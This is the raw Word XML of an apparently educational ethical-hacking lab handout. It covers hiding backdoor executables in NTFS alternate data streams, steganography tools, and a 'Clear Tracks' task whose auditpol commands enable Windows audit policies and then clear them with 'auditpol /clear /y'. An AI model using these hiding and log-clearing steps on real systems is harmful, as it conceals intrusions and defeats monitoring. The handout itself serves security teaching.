      <w:tr w:rsidR="00A715A6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8640" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w:rsidR="00A715A6" w:rsidRPr="00A40470" w:rsidRDefault="00A40470">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00A40470">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">When you now run the backdoor.exe it will run the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A40470">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>calc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A40470">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> application</w:t>
            </w:r>
            <w:r w:rsidR="00C416A1" w:rsidRPr="00A40470">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C416A1" w:rsidRPr="00A40470">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C416A1" w:rsidRPr="00A40470">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C416A1" w:rsidRPr="00A40470">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C416A1" w:rsidRPr="00A40470">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C416A1" w:rsidRPr="00A40470">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C416A1" w:rsidRPr="00A40470">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C416A1" w:rsidRPr="00A40470">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C416A1" w:rsidRPr="00A40470">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C416A1" w:rsidRPr="00A40470">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C416A1" w:rsidRPr="00A40470">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A715A6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8640" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>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p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A715A6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8640" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>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p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="5" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="-15" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Two Dimensions: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="5" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="358" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">As an attacker, in your previous labs, you have created bat/ exe files which you used to gain and maintain access. Those files could be hidden using NTFS streams (like this method), so that the users could not see your malicious file. So, you could execute them remotely whenever you need it.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="53" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="41" w:line="234" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:u w:val="single" w:color="FF0000"/>
        </w:rPr>
        <w:t>If you are a security personal (doing a penetration testing) keep in mind that the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:u w:val="single" w:color="FF0000"/>
        </w:rPr>
        <w:t>malicious files could be hidden in this format which needs your attention.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="44" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:line="234" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="-15" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">You could also try </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Stegno</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> tools like Snow, Quick </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Stego</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Open</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Stego</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and record your reflection. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="-15" w:right="-15"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="43" w:line="234" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="-15" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Try them and record them in your coursework and/or in the shared </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Onenote</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> with instructions to gain CREDITS </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Task 4: Clear Tracks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="5" w:line="237" w:lineRule="auto"/>
        <w:ind w:right="-15" w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Auditpol</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="5" w:line="237" w:lineRule="auto"/>
        <w:ind w:right="-15" w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Login to your Windows 2016 Server. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="175" w:line="237" w:lineRule="auto"/>
        <w:ind w:right="-15" w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Command Prompt </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="176" w:line="453" w:lineRule="auto"/>
        <w:ind w:right="5002"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Auditpol</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> /get/category:*  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="35"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>┘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>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Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>It would list all the categories</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>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Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Enable the Audit Policies</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="204" w:line="237" w:lineRule="auto"/>
        <w:ind w:right="-15" w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>auditpol</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve"> /set /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>category:”system</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">”, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>“account logon” /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>success:enable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>failure:enable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="35"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>┘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="5" w:line="354" w:lineRule="auto"/>
        <w:ind w:right="-15" w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Auditpol</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> /get/category:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">*  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="35"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>┘</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:eastAsia="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> You could see the settings. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="175" w:line="237" w:lineRule="auto"/>
        <w:ind w:right="-15" w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">To clear them… </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="5" w:line="237" w:lineRule="auto"/>
        <w:ind w:right="5002"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Auditpol</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> /clear /y  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Auditpol</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> /get/category:*  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="35"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>┘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
